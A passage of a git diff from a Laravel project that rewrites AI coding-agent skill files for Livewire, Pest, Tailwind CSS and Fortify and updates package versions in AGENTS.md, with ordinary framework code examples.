-  writing Livewire tests; or when the user mentions Livewire, component, counter, or reactive UI.
+description: "Use for any task or question involving Livewire. Activate if user mentions Livewire, wire: directives, or Livewire-specific concepts like wire:model, wire:click, invoke this skill. Covers building new components, debugging reactivity issues, real-time form validation, loading states, migrating from Livewire 2 to 3, converting component formats (SFC/MFC/class-based), and performance optimization. Do not use for non-Livewire reactive UI (React, Vue, Alpine-only, Inertia.js) or standard Laravel forms without Livewire."
+license: MIT
+metadata:
+  author: laravel
 ---
 
 # Livewire Development
 
-## When to Apply
-
-Activate this skill when:
-- Creating new Livewire components
-- Modifying existing component state or behavior
-- Debugging reactivity or lifecycle issues
-- Writing Livewire component tests
-- Adding Alpine.js interactivity to components
-- Working with wire: directives
-
 ## Documentation
 
 Use `search-docs` for detailed Livewire 3 patterns and documentation.
@@ -62,33 +51,31 @@ ### Component Structure
 
 ### Using Keys in Loops
 
-<code-snippet name="Wire Key in Loops" lang="blade">
-
+<!-- Wire Key in Loops -->
+```blade
 @foreach ($items as $item)
     <div wire:key="item-{{ $item->id }}">
         {{ $item->name }}
     </div>
 @endforeach
-
-</code-snippet>
+```
 
 ### Lifecycle Hooks
 
 Prefer lifecycle hooks like `mount()`, `updatedFoo()` for initialization and reactive side effects:
 
-<code-snippet name="Lifecycle Hook Examples" lang="php">
-
+<!-- Lifecycle Hook Examples -->
+```php
 public function mount(User $user) { $this->user = $user; }
 public function updatedSearch() { $this->resetPage(); }
-
-</code-snippet>
+```
 
 ## JavaScript Hooks
 
 You can listen for `livewire:init` to hook into Livewire initialization:
 
-<code-snippet name="Livewire Init Hook Example" lang="js">
-
+<!-- Livewire Init Hook Example -->
+```js
 document.addEventListener('livewire:init', function () {
     Livewire.hook('request', ({ fail }) => {
         if (fail && fail.status === 419) {
@@ -100,28 +87,25 @@ ## JavaScript Hooks
         console.error(message);
     });
 });
-
-</code-snippet>
+```
 
 ## Testing
 
-<code-snippet name="Example Livewire Component Test" lang="php">
-
+<!-- Example Livewire Component Test -->
+```php
 Livewire::test(Counter::class)
     ->assertSet('count', 0)
     ->call('increment')
     ->assertSet('count', 1)
     ->assertSee(1)
     ->assertStatus(200);
+```
 
-</code-snippet>
-
-<code-snippet name="Testing Livewire Component Exists on Page" lang="php">
-
+<!-- Testing Livewire Component Exists on Page -->
+```php
 $this->get('/posts/create')
     ->assertSeeLivewire(CreatePost::class);
-
-</code-snippet>
+```
 
 ## Common Pitfalls
 
diff --git a/.claude/skills/pest-testing/SKILL.md b/.claude/skills/pest-testing/SKILL.md
index 9ca79830a..ba774e71b 100644
--- a/.claude/skills/pest-testing/SKILL.md
+++ b/.claude/skills/pest-testing/SKILL.md
@@ -1,63 +1,55 @@
 ---
 name: pest-testing
-description: >-
-  Tests applications using the Pest 4 PHP framework. Activates when writing tests, creating unit or feature
-  tests, adding assertions, testing Livewire components, browser testing, debugging test failures,
-  working with datasets or mocking; or when the user mentions test, spec, TDD, expects, assertion,
-  coverage, or needs to verify functionality works.
+description: "Use this skill for Pest PHP testing in Laravel projects only. Trigger whenever any test is being written, edited, fixed, or refactored — including fixing tests that broke after a code change, adding assertions, converting PHPUnit to Pest, adding datasets, and TDD workflows. Always activate when the user asks how to write something in Pest, mentions test files or directories (tests/Feature, tests/Unit, tests/Browser), or needs browser testing, smoke testing multiple pages for JS errors, or architecture tests. Covers: it()/expect() syntax, datasets, mocking, browser testing (visit/click/fill), smoke testing, arch(), Livewire component tests, RefreshDatabase, and all Pest 4 features. Do not use for factories, seeders, migrations, controllers, models, or non-test PHP code."
+license: MIT
+metadata:
+  author: laravel
 ---
 
 # Pest Testing 4
 
-## When to Apply
-
-Activate this skill when:
-
-- Creating new tests (unit, feature, or browser)
-- Modifying existing tests
-- Debugging test failures
-- Working with browser testing or smoke testing
-- Writing architecture tests or visual regression tests
-
 ## Documentation
 
 Use `search-docs` for detailed Pest 4 patterns and documentation.
 
-## Test Directory Structure
+## Basic Usage
 
-- `tests/Feature/` and `tests/Unit/` — Legacy tests (keep, don't delete)
-- `tests/v4/Feature/` — New feature tests (SQLite :memory: database)
-- `tests/v4/Browser/` — Browser tests (Pest Browser Plugin + Playwright)
-- `tests/Browser/` — Legacy Dusk browser tests (keep, don't delete)
+### Creating Tests
 
-New tests go in `tests/v4/`. The v4 suite uses SQLite :memory: with a schema dump (`database/schema/testing-schema.sql`) instead of running migrations.
+All tests must be written using Pest. Use `php artisan make:test --pest {name}`.
 
-Do NOT remove tests without approval.
+### Test Organization
 
-## Running Tests
+- Unit/Feature tests: `tests/Feature` and `tests/Unit` directories.
+- Browser tests: `tests/Browser/` directory.
+- Do NOT remove tests without approval - these are core application code.
 
-- All v4 tests: `php artisan test --compact tests/v4/`
-- Browser tests: `php artisan test --compact tests/v4/Browser/`
-- Feature tests: `php artisan test --compact tests/v4/Feature/`
-- Specific file: `php artisan test --compact tests/v4/Browser/LoginTest.php`
-- Filter: `php artisan test --compact --filter=testName`
-- Headed (see browser): `./vendor/bin/pest tests/v4/Browser/ --headed`
-- Debug (pause on failure): `./vendor/bin/pest tests/v4/Browser/ --debug`
-
-## Basic Test Structure
-
-<code-snippet name="Basic Pest Test Example" lang="php">
+### Basic Test Structure
 
+<!-- Basic Pest Test Example -->
+```php
 it('is true', function () {
     expect(true)->toBeTrue();
 });
+```
 
-</code-snippet>
+### Running Tests
+
+- Run minimal tests with filter before finalizing: `php artisan test --compact --filter=testName`.
+- Run all tests: `php artisan test --compact`.
+- Run file: `php artisan test --compact tests/Feature/ExampleTest.php`.
 
 ## Assertions
 
 Use specific assertions (`assertSuccessful()`, `assertNotFound()`) instead of `assertStatus()`:
 
+<!-- Pest Response Assertion -->
+```php
+it('returns all', function () {
+    $this->postJson('/api/docs', [])->assertSuccessful();
+});
+```
+
 | Use | Instead of |
 |-----|------------|
 | `assertSuccessful()` | `assertStatus(200)` |
@@ -70,116 +62,91 @@ ## Mocking
 
 ## Datasets
 
-Use datasets for repetitive tests:
-
-<code-snippet name="Pest Dataset Example" lang="php">
+Use datasets for repetitive tests (validation rules, etc.):
 
+<!-- Pest Dataset Example -->
+```php
 it('has emails', function (string $email) {
     expect($email)->not->toBeEmpty();
 })->with([
     'james' => 'james@laravel.com',
     'taylor' => 'taylor@laravel.com',
 ]);
-
-</code-snippet>
-
-## Browser Testing (Pest Browser Plugin + Playwright)
-
-Browser tests use `pestphp/pest-plugin-browser` with Playwright. They run **outside Docker** — the plugin starts an in-process HTTP server and Playwright browser automatically.
-
-### Key Rules
-
-1. **Always use `RefreshDatabase`** — the in-process server uses SQLite :memory:
-2. **Always seed `InstanceSettings::create(['id' => 0])` in `beforeEach`** — most pages crash without it
-3. **Use `User::factory()` for auth tests** — create users with `id => 0` for root user
-4. **No Dusk, no Selenium** — use `visit()`, `fill()`, `click()`, `assertSee()` from the Pest Browser API
-5. **Place tests in `tests/v4/Browser/`**
-6. **Views with bare `function` declarations** will crash on the second request in the same process — wrap with `function_exists()` guard if you encounter this
-
-### Browser Test Template
-
-<code-snippet name="Coolify Browser Test Template" lang="php">
-<?php
-
-use App\Models\InstanceSettings;
-use Illuminate\Foundation\Testing\RefreshDatabase;
-
-uses(RefreshDatabase::class);
-
-beforeEach(function () {
-    InstanceSettings::create(['id' => 0]);
-});
-
-it('can visit the page', function () {
-    $page = visit('/login');
-
-    $page->assertSee('Login');
-});
-</code-snippet>
-
-### Browser Test with Form Interaction
-
-<code-snippet name="Browser Test Form Example" lang="php">
-it('fails login with invalid credentials', function () {
-    User::factory()->create([
-        'id' => 0,
-        'email' => 'test@example.com',
-        'password' => Hash::make('password'),
-    ]);
-
-    $page = visit('/login');
-
-    $page->fill('email', 'random@email.com')
-        ->fill('password', 'wrongpassword123')
-        ->click('Login')
-        ->assertSee('These credentials do not match our records');
-});
-</code-snippet>
-
-### Browser API Reference
-
-| Method | Purpose |
-|--------|---------|
-| `visit('/path')` | Navigate to a page |
-| `->fill('field', 'value')` | Fill an input by name |
-| `->click('Button Text')` | Click a button/link by text |
-| `->assertSee('text')` | Assert visible text |
-| `->assertDontSee('text')` | Assert text is not visible |
-| `->assertPathIs('/path')` | Assert current URL path |
-| `->assertSeeIn('.selector', 'text')` | Assert text in element |
-| `->screenshot()` | Capture screenshot |
-| `->debug()` | Pause test, keep browser open |
-| `->wait(seconds)` | Wait N seconds |
-
-### Debugging
-
-- Screenshots auto-saved to `tests/Browser/Screenshots/` on failure
-- `->debug()` pauses and keeps browser open (press Enter to continue)
-- `->screenshot()` captures state at any point
-- `--headed` flag shows browser, `--debug` pauses on failure
-
-## SQLite Testing Setup
-
-v4 tests use SQLite :memory: instead of PostgreSQL. Schema loaded from `database/schema/testing-schema.sql`.
-
-### Regenerating the Schema
-
-When migrations change, regenerate from the running PostgreSQL database:
-
-```bash
-docker exec coolify php artisan schema:generate-testing
 ```
 
-## Architecture Testing
+## Pest 4 Features
 
-<code-snippet name="Architecture Test Example" lang="php">
+| Feature | Purpose |
+|---------|---------|
+| Browser Testing | Full integration tests in real browsers |
+| Smoke Testing | Validate multiple pages quickly |
+| Visual Regression | Compare screenshots for visual changes |
+| Test Sharding | Parallel CI runs |
+| Architecture Testing | Enforce code conventions |
 
+### Browser Test Example
+
+Browser tests run in real browsers for full integration testing:
+
+- Browser tests live in `tests/Browser/`.
+- Use Laravel features like `Event::fake()`, `assertAuthenticated()`, and model factories.
+- Use `RefreshDatabase` for clean state per test.
+- Interact with page: click, type, scroll, select, submit, drag-and-drop, touch gestures.
+- Test on multiple browsers (Chrome, Firefox, Safari) if requested.
+- Test on different devices/viewports (iPhone 14 Pro, tablets) if requested.
+- Switch color schemes (light/dark mode) when appropriate.
+- Take screenshots or pause tests for debugging.
+
+<!-- Pest Browser Test Example -->
+```php
+it('may reset the password', function () {
+    Notification::fake();
+
+    $this->actingAs(User::factory()->create());
+
+    $page = visit('/sign-in');
+
+    $page->assertSee('Sign In')
+        ->assertNoJavaScriptErrors()
+        ->click('Forgot Password?')
+        ->fill('email', 'nuno@laravel.com')
+        ->click('Send Reset Link')
+        ->assertSee('We have emailed your password reset link!');
+
+    Notification::assertSent(ResetPassword::class);
+});
+```
+
+### Smoke Testing
+
+Quickly validate multiple pages have no JavaScript errors:
+
+<!-- Pest Smoke Testing Example -->
+```php
+$pages = visit(['/', '/about', '/contact']);
+
+$pages->assertNoJavaScriptErrors()->assertNoConsoleLogs();
+```
+
+### Visual Regression Testing
+
+Capture and compare screenshots to detect visual changes.
+
+### Test Sharding
+
+Split tests across parallel processes for faster CI runs.
+
+### Architecture Testing
+
+Pest 4 includes architecture testing (from Pest 3):
+
+<!-- Architecture Test Example -->
+```php
 arch('controllers')
     ->expect('App\Http\Controllers')
     ->toExtendNothing()
     ->toHaveSuffix('Controller');
-
-</code-snippet>
+```
 
 ## Common Pitfalls
 
@@ -187,7 +154,4 @@ ## Common Pitfalls
 - Using `assertStatus(200)` instead of `assertSuccessful()`
 - Forgetting datasets for repetitive validation tests
 - Deleting tests without approval
-- Forgetting `assertNoJavaScriptErrors()` in browser tests
-- **Browser tests: forgetting `InstanceSettings::create(['id' => 0])` — most pages crash without it**
-- **Browser tests: forgetting `RefreshDatabase` — SQLite :memory: starts empty**
-- **Browser tests: views with bare `function` declarations crash on second request — wrap with `function_exists()` guard**
+- Forgetting `assertNoJavaScriptErrors()` in browser tests
\ No newline at end of file
diff --git a/.claude/skills/tailwindcss-development/SKILL.md b/.claude/skills/tailwindcss-development/SKILL.md
index 12bd896bb..7c8e295e8 100644
--- a/.claude/skills/tailwindcss-development/SKILL.md
+++ b/.claude/skills/tailwindcss-development/SKILL.md
@@ -1,24 +1,13 @@
 ---
 name: tailwindcss-development
-description: >-
-  Styles applications using Tailwind CSS v4 utilities. Activates when adding styles, restyling components,
-  working with gradients, spacing, layout, flex, grid, responsive design, dark mode, colors,
-  typography, or borders; or when the user mentions CSS, styling, classes, Tailwind, restyle,
-  hero section, cards, buttons, or any visual/UI changes.
+description: "Always invoke when the user's message includes 'tailwind' in any form. Also invoke for: building responsive grid layouts (multi-column card grids, product grids), flex/grid page structures (dashboards with sidebars, fixed topbars, mobile-toggle navs), styling UI components (cards, tables, navbars, pricing sections, forms, inputs, badges), adding dark mode variants, fixing spacing or typography, and Tailwind v3/v4 work. The core use case: writing or fixing Tailwind utility classes in HTML templates (Blade, JSX, Vue). Skip for backend PHP logic, database queries, API routes, JavaScript with no HTML/CSS component, CSS file audits, build tool configuration, and vanilla CSS."
+license: MIT
+metadata:
+  author: laravel
 ---
 
 # Tailwind CSS Development
 
-## When to Apply
-
-Activate this skill when:
-
-- Adding styles to components or pages
-- Working with responsive design
-- Implementing dark mode
-- Extracting repeated patterns into components
-- Debugging spacing or layout issues
-
 ## Documentation
 
 Use `search-docs` for detailed Tailwind CSS v4 patterns and documentation.
@@ -38,22 +27,24 @@ ### CSS-First Configuration
 
 In Tailwind v4, configuration is CSS-first using the `@theme` directive — no separate `tailwind.config.js` file is needed:
 
-<code-snippet name="CSS-First Config" lang="css">
+<!-- CSS-First Config -->
+```css
 @theme {
   --color-brand: oklch(0.72 0.11 178);
 }
-</code-snippet>
+```
 
 ### Import Syntax
 
 In Tailwind v4, import Tailwind with a regular CSS `@import` statement instead of the `@tailwind` directives used in v3:
 
-<code-snippet name="v4 Import Syntax" lang="diff">
+<!-- v4 Import Syntax -->
+```diff
 - @tailwind base;
 - @tailwind components;
 - @tailwind utilities;
 + @import "tailwindcss";
-</code-snippet>
+```
 
 ### Replaced Utilities
 
@@ -77,43 +68,47 @@ ## Spacing
 
 Use `gap` utilities instead of margins for spacing between siblings:
 
-<code-snippet name="Gap Utilities" lang="html">
+<!-- Gap Utilities -->
+```html
 <div class="flex gap-8">
     <div>Item 1</div>
     <div>Item 2</div>
 </div>
-</code-snippet>
+```
 
 ## Dark Mode
 
 If existing pages and components support dark mode, new pages and components must support it the same way, typically using the `dark:` variant:
 
-<code-snippet name="Dark Mode" lang="html">
+<!-- Dark Mode -->
+```html
 <div class="bg-white dark:bg-gray-900 text-gray-900 dark:text-white">
     Content adapts to color scheme
 </div>
-</code-snippet>
+```
 
 ## Common Patterns
 
 ### Flexbox Layout
 
-<code-snippet name="Flexbox Layout" lang="html">
+<!-- Flexbox Layout -->
+```html
 <div class="flex items-center justify-between gap-4">
     <div>Left content</div>
     <div>Right content</div>
 </div>
-</code-snippet>
+```
 
 ### Grid Layout
 
-<code-snippet name="Grid Layout" lang="html">
+<!-- Grid Layout -->
+```html
 <div class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-3 gap-6">
     <div>Card 1</div>
     <div>Card 2</div>
     <div>Card 3</div>
 </div>
-</code-snippet>
+```
 
 ## Common Pitfalls
 
diff --git a/.cursor/skills/developing-with-fortify/SKILL.md b/.cursor/skills/developing-with-fortify/SKILL.md
deleted file mode 100644
index 2ff71a4b4..000000000
--- a/.cursor/skills/developing-with-fortify/SKILL.md
+++ /dev/null
@@ -1,116 +0,0 @@
----
-name: developing-with-fortify
-description: Laravel Fortify headless authentication backend development. Activate when implementing authentication features including login, registration, password reset, email verification, two-factor authentication (2FA/TOTP), profile updates, headless auth, authentication scaffolding, or auth guards in Laravel applications.
----
-
-# Laravel Fortify Development
-
-Fortify is a headless authentication backend that provides authentication routes and controllers for Laravel applications.
-
-## Documentation
-
-Use `search-docs` for detailed Laravel Fortify patterns and documentation.
-
-## Usage
-
-- **Routes**: Use `list-routes` with `only_vendor: true` and `action: "Fortify"` to see all registered endpoints
-- **Actions**: Check `app/Actions/Fortify/` for customizable business logic (user creation, password validation, etc.)
-- **Config**: See `config/fortify.php` for all options including features, guards, rate limiters, and username field
-- **Contracts**: Look in `Laravel\Fortify\Contracts\` for overridable response classes (`LoginResponse`, `LogoutResponse`, etc.)
-- **Views**: All view callbacks are set in `FortifyServiceProvider::boot()` using `Fortify::loginView()`, `Fortify::registerView()`, etc.
-
-## Available Features
-
-Enable in `config/fortify.php` features array:
-
-- `Features::registration()` - User registration
-- `Features::resetPasswords()` - Password reset via email
-- `Features::emailVerification()` - Requires User to implement `MustVerifyEmail`
-- `Features::updateProfileInformation()` - Profile updates
-- `Features::updatePasswords()` - Password changes
-- `Features::twoFactorAuthentication()` - 2FA with QR codes and recovery codes
-
-> Use `search-docs` for feature configuration options and customization patterns.
-
-## Setup Workflows
-
-### Two-Factor Authentication Setup
-
-```
-- [ ] Add TwoFactorAuthenticatable trait to User model
-- [ ] Enable feature in config/fortify.php
-- [ ] Run migrations for 2FA columns
-- [ ] Set up view callbacks in FortifyServiceProvider
-- [ ] Create 2FA management UI
-- [ ] Test QR code and recovery codes
-```
-
-> Use `search-docs` for TOTP implementation and recovery code handling patterns.
-
-### Email Verification Setup
-
-```
-- [ ] Enable emailVerification feature in config
-- [ ] Implement MustVerifyEmail interface on User model
-- [ ] Set up verifyEmailView callback
-- [ ] Add verified middleware to protected routes
-- [ ] Test verification email flow
-```
-
-> Use `search-docs` for MustVerifyEmail implementation patterns.
-
-### Password Reset Setup
-
-```
-- [ ] Enable resetPasswords feature in config
-- [ ] Set up requestPasswordResetLinkView callback
-- [ ] Set up resetPasswordView callback
-- [ ] Define password.reset named route (if views disabled)
-- [ ] Test reset email and link flow
-```
-
-> Use `search-docs` for custom password reset flow patterns.
-
-### SPA Authentication Setup
-
-```
-- [ ] Set 'views' => false in config/fortify.php
-- [ ] Install and configure Laravel Sanctum
-- [ ] Use 'web' guard in fortify config
-- [ ] Set up CSRF token handling
-- [ ] Test XHR authentication flows
-```
-
-> Use `search-docs` for integration and SPA authentication patterns.
-
-## Best Practices
-
-### Custom Authentication Logic
-
-Override authentication behavior using `Fortify::authenticateUsing()` for custom user retrieval or `Fortify::authenticateThrough()` to customize the authentication pipeline. Override response contracts in `AppServiceProvider` for custom redirects.
-
-### Registration Customization
-
-Modify `app/Actions/Fortify/CreateNewUser.php` to customize user creation logic, validation rules, and additional fields.
-
-### Rate Limiting
-
-Configure via `fortify.limiters.login` in config. Default configuration throttles by username + IP combination.
-
-## Key Endpoints
-
-| Feature                | Method   | Endpoint                                    |
-|------------------------|----------|---------------------------------------------|
-| Login                  | POST     | `/login`                                    |
-| Logout                 | POST     | `/logout`                                   |
-| Register               | POST     | `/register`                                 |
-| Password Reset Request | POST     | `/forgot-password`                          |
-| Password Reset         | POST     | `/reset-password`                           |
-| Email Verify Notice    | GET      | `/email/verify`                             |
-| Resend Verification    | POST     | `/email/verification-notification`          |
-| Password Confirm       | POST     | `/user/confirm-password`                    |
-| Enable 2FA             | POST     | `/user/two-factor-authentication`           |
-| Confirm 2FA            | POST     | `/user/confirmed-two-factor-authentication` |
-| 2FA Challenge          | POST     | `/two-factor-challenge`                     |
-| Get QR Code            | GET      | `/user/two-factor-qr-code`                  |
-| Recovery Codes         | GET/POST | `/user/two-factor-recovery-codes`           |
\ No newline at end of file
diff --git a/.cursor/skills/livewire-development/SKILL.md b/.cursor/skills/livewire-development/SKILL.md
index 755d20713..70ecd57d4 100644
--- a/.cursor/skills/livewire-development/SKILL.md
+++ b/.cursor/skills/livewire-development/SKILL.md
@@ -1,24 +1,13 @@
 ---
 name: livewire-development
-description: >-
-  Develops reactive Livewire 3 components. Activates when creating, updating, or modifying
-  Livewire components; working with wire:model, wire:click, wire:loading, or any wire: directives;
-  adding real-time updates, loading states, or reactivity; debugging component behavior;
-  writing Livewire tests; or when the user mentions Livewire, component, counter, or reactive UI.
+description: "Use for any task or question involving Livewire. Activate if user mentions Livewire, wire: directives, or Livewire-specific concepts like wire:model, wire:click, invoke this skill. Covers building new components, debugging reactivity issues, real-time form validation, loading states, migrating from Livewire 2 to 3, converting component formats (SFC/MFC/class-based), and performance optimization. Do not use for non-Livewire reactive UI (React, Vue, Alpine-only, Inertia.js) or standard Laravel forms without Livewire."
+license: MIT
+metadata:
+  author: laravel
 ---
 
 # Livewire Development
 
-## When to Apply
-
-Activate this skill when:
-- Creating new Livewire components
-- Modifying existing component state or behavior
-- Debugging reactivity or lifecycle issues
-- Writing Livewire component tests
-- Adding Alpine.js interactivity to components
-- Working with wire: directives
-
 ## Documentation
 
 Use `search-docs` for detailed Livewire 3 patterns and documentation.
@@ -62,33 +51,31 @@ ### Component Structure
 
 ### Using Keys in Loops
 
-<code-snippet name="Wire Key in Loops" lang="blade">
-
+<!-- Wire Key in Loops -->
+```blade
 @foreach ($items as $item)
     <div wire:key="item-{{ $item->id }}">
         {{ $item->name }}
     </div>
 @endforeach
-
-</code-snippet>
+```
 
 ### Lifecycle Hooks
 
 Prefer lifecycle hooks like `mount()`, `updatedFoo()` for initialization and reactive side effects:
 
-<code-snippet name="Lifecycle Hook Examples" lang="php">
-
+<!-- Lifecycle Hook Examples -->
+```php
 public function mount(User $user) { $this->user = $user; }
 public function updatedSearch() { $this->resetPage(); }
-
-</code-snippet>
+```
 
 ## JavaScript Hooks
 
 You can listen for `livewire:init` to hook into Livewire initialization:
 
-<code-snippet name="Livewire Init Hook Example" lang="js">
-
+<!-- Livewire Init Hook Example -->
+```js
 document.addEventListener('livewire:init', function () {
     Livewire.hook('request', ({ fail }) => {
         if (fail && fail.status === 419) {
@@ -100,28 +87,25 @@ ## JavaScript Hooks
         console.error(message);
     });
 });
-
-</code-snippet>
+```
 
 ## Testing
 
-<code-snippet name="Example Livewire Component Test" lang="php">
-
+<!-- Example Livewire Component Test -->
+```php
 Livewire::test(Counter::class)
     ->assertSet('count', 0)
     ->call('increment')
     ->assertSet('count', 1)
     ->assertSee(1)
     ->assertStatus(200);
+```
 
-</code-snippet>
-
-<code-snippet name="Testing Livewire Component Exists on Page" lang="php">
-
+<!-- Testing Livewire Component Exists on Page -->
+```php
 $this->get('/posts/create')
     ->assertSeeLivewire(CreatePost::class);
-
-</code-snippet>
+```
 
 ## Common Pitfalls
 
diff --git a/.cursor/skills/pest-testing/SKILL.md b/.cursor/skills/pest-testing/SKILL.md
index 67455e7e6..ba774e71b 100644
--- a/.cursor/skills/pest-testing/SKILL.md
+++ b/.cursor/skills/pest-testing/SKILL.md
@@ -1,24 +1,13 @@
 ---
 name: pest-testing
-description: >-
-  Tests applications using the Pest 4 PHP framework. Activates when writing tests, creating unit or feature
-  tests, adding assertions, testing Livewire components, browser testing, debugging test failures,
-  working with datasets or mocking; or when the user mentions test, spec, TDD, expects, assertion,
-  coverage, or needs to verify functionality works.
+description: "Use this skill for Pest PHP testing in Laravel projects only. Trigger whenever any test is being written, edited, fixed, or refactored — including fixing tests that broke after a code change, adding assertions, converting PHPUnit to Pest, adding datasets, and TDD workflows. Always activate when the user asks how to write something in Pest, mentions test files or directories (tests/Feature, tests/Unit, tests/Browser), or needs browser testing, smoke testing multiple pages for JS errors, or architecture tests. Covers: it()/expect() syntax, datasets, mocking, browser testing (visit/click/fill), smoke testing, arch(), Livewire component tests, RefreshDatabase, and all Pest 4 features. Do not use for factories, seeders, migrations, controllers, models, or non-test PHP code."
+license: MIT
+metadata:
+  author: laravel
 ---
 
 # Pest Testing 4
 
-## When to Apply
-
-Activate this skill when:
-
-- Creating new tests (unit, feature, or browser)
-- Modifying existing tests
-- Debugging test failures
-- Working with browser testing or smoke testing
-- Writing architecture tests or visual regression tests
-
 ## Documentation
 
 Use `search-docs` for detailed Pest 4 patterns and documentation.
@@ -37,13 +26,12 @@ ### Test Organization
 
 ### Basic Test Structure
 
-<code-snippet name="Basic Pest Test Example" lang="php">
-
+<!-- Basic Pest Test Example -->
+```php
 it('is true', function () {
     expect(true)->toBeTrue();
 });
-
-</code-snippet>
+```
 
 ### Running Tests
 
@@ -55,13 +43,12 @@ ## Assertions
 
 Use specific assertions (`assertSuccessful()`, `assertNotFound()`) instead of `assertStatus()`:
 
-<code-snippet name="Pest Response Assertion" lang="php">
-
+<!-- Pest Response Assertion -->
+```php
 it('returns all', function () {
     $this->postJson('/api/docs', [])->assertSuccessful();
 });
-
-</code-snippet>
+```
 
 | Use | Instead of |
 |-----|------------|
@@ -77,16 +64,15 @@ ## Datasets
 
 Use datasets for repetitive tests (validation rules, etc.):
 
-<code-snippet name="Pest Dataset Example" lang="php">
-
+<!-- Pest Dataset Example -->
+```php
 it('has emails', function (string $email) {
     expect($email)->not->toBeEmpty();
 })->with([
     'james' => 'james@laravel.com',
     'taylor' => 'taylor@laravel.com',
 ]);
-
-</code-snippet>
+```
 
 ## Pest 4 Features
 
@@ -111,8 +97,8 @@ ### Browser Test Example
 - Switch color schemes (light/dark mode) when appropriate.
 - Take screenshots or pause tests for debugging.
 
-<code-snippet name="Pest Browser Test Example" lang="php">
-
+<!-- Pest Browser Test Example -->
+```php
 it('may reset the password', function () {
     Notification::fake();
 
@@ -129,20 +115,18 @@ ### Browser Test Example
 
     Notification::assertSent(ResetPassword::class);
 });
-
-</code-snippet>
+```
 
 ### Smoke Testing
 
 Quickly validate multiple pages have no JavaScript errors:
 
-<code-snippet name="Pest Smoke Testing Example" lang="php">
-
+<!-- Pest Smoke Testing Example -->
+```php
 $pages = visit(['/', '/about', '/contact']);
 
 $pages->assertNoJavaScriptErrors()->assertNoConsoleLogs();
-
-</code-snippet>
+```
 
 ### Visual Regression Testing
 
@@ -156,14 +140,13 @@ ### Architecture Testing
 
 Pest 4 includes architecture testing (from Pest 3):
 
-<code-snippet name="Architecture Test Example" lang="php">
-
+<!-- Architecture Test Example -->
+```php
 arch('controllers')
     ->expect('App\Http\Controllers')
     ->toExtendNothing()
     ->toHaveSuffix('Controller');
-
-</code-snippet>
+```
 
 ## Common Pitfalls
 
diff --git a/.cursor/skills/tailwindcss-development/SKILL.md b/.cursor/skills/tailwindcss-development/SKILL.md
index 12bd896bb..7c8e295e8 100644
--- a/.cursor/skills/tailwindcss-development/SKILL.md
+++ b/.cursor/skills/tailwindcss-development/SKILL.md
@@ -1,24 +1,13 @@
 ---
 name: tailwindcss-development
-description: >-
-  Styles applications using Tailwind CSS v4 utilities. Activates when adding styles, restyling components,
-  working with gradients, spacing, layout, flex, grid, responsive design, dark mode, colors,
-  typography, or borders; or when the user mentions CSS, styling, classes, Tailwind, restyle,
-  hero section, cards, buttons, or any visual/UI changes.
+description: "Always invoke when the user's message includes 'tailwind' in any form. Also invoke for: building responsive grid layouts (multi-column card grids, product grids), flex/grid page structures (dashboards with sidebars, fixed topbars, mobile-toggle navs), styling UI components (cards, tables, navbars, pricing sections, forms, inputs, badges), adding dark mode variants, fixing spacing or typography, and Tailwind v3/v4 work. The core use case: writing or fixing Tailwind utility classes in HTML templates (Blade, JSX, Vue). Skip for backend PHP logic, database queries, API routes, JavaScript with no HTML/CSS component, CSS file audits, build tool configuration, and vanilla CSS."
+license: MIT
+metadata:
+  author: laravel
 ---
 
 # Tailwind CSS Development
 
-## When to Apply
-
-Activate this skill when:
-
-- Adding styles to components or pages
-- Working with responsive design
-- Implementing dark mode
-- Extracting repeated patterns into components
-- Debugging spacing or layout issues
-
 ## Documentation
 
 Use `search-docs` for detailed Tailwind CSS v4 patterns and documentation.
@@ -38,22 +27,24 @@ ### CSS-First Configuration
 
 In Tailwind v4, configuration is CSS-first using the `@theme` directive — no separate `tailwind.config.js` file is needed:
 
-<code-snippet name="CSS-First Config" lang="css">
+<!-- CSS-First Config -->
+```css
 @theme {
   --color-brand: oklch(0.72 0.11 178);
 }
-</code-snippet>
+```
 
 ### Import Syntax
 
 In Tailwind v4, import Tailwind with a regular CSS `@import` statement instead of the `@tailwind` directives used in v3:
 
-<code-snippet name="v4 Import Syntax" lang="diff">
+<!-- v4 Import Syntax -->
+```diff
 - @tailwind base;
 - @tailwind components;
 - @tailwind utilities;
 + @import "tailwindcss";
-</code-snippet>
+```
 
 ### Replaced Utilities
 
@@ -77,43 +68,47 @@ ## Spacing
 
 Use `gap` utilities instead of margins for spacing between siblings:
 
-<code-snippet name="Gap Utilities" lang="html">
+<!-- Gap Utilities -->
+```html
 <div class="flex gap-8">
     <div>Item 1</div>
     <div>Item 2</div>
 </div>
-</code-snippet>
+```
 
 ## Dark Mode
 
 If existing pages and components support dark mode, new pages and components must support it the same way, typically using the `dark:` variant:
 
-<code-snippet name="Dark Mode" lang="html">
+<!-- Dark Mode -->
+```html
 <div class="bg-white dark:bg-gray-900 text-gray-900 dark:text-white">
     Content adapts to color scheme
 </div>
-</code-snippet>
+```
 
 ## Common Patterns
 
 ### Flexbox Layout
 
-<code-snippet name="Flexbox Layout" lang="html">
+<!-- Flexbox Layout -->
+```html
 <div class="flex items-center justify-between gap-4">
     <div>Left content</div>
     <div>Right content</div>
 </div>
-</code-snippet>
+```
 
 ### Grid Layout
 
-<code-snippet name="Grid Layout" lang="html">
+<!-- Grid Layout -->
+```html
 <div class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-3 gap-6">
     <div>Card 1</div>
     <div>Card 2</div>
     <div>Card 3</div>
 </div>
-</code-snippet>
+```
 
 ## Common Pitfalls
 
diff --git a/AGENTS.md b/AGENTS.md
index 162c23842..3fff0074e 100644
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -9,14 +9,17 @@ ## Foundational Context
 
 This application is a Laravel application and its main Laravel ecosystems package & versions are below. You are an expert with them all. Ensure you abide by these specific packages & versions.
 
-- php - 8.4.1
+- php - 8.5
 - laravel/fortify (FORTIFY) - v1
 - laravel/framework (LARAVEL) - v12
 - laravel/horizon (HORIZON) - v5
+- laravel/nightwatch (NIGHTWATCH) - v1
+- laravel/pail (PAIL) - v1
 - laravel/prompts (PROMPTS) - v0
 - laravel/sanctum (SANCTUM) - v4
 - laravel/socialite (SOCIALITE) - v5
 - livewire/livewire (LIVEWIRE) - v3
+- laravel/boost (BOOST) - v2
 - laravel/dusk (DUSK) - v8
 - laravel/mcp (MCP) - v0
 - laravel/pint (PINT) - v1
@@ -32,11 +35,15 @@ ## Skills Activation
 
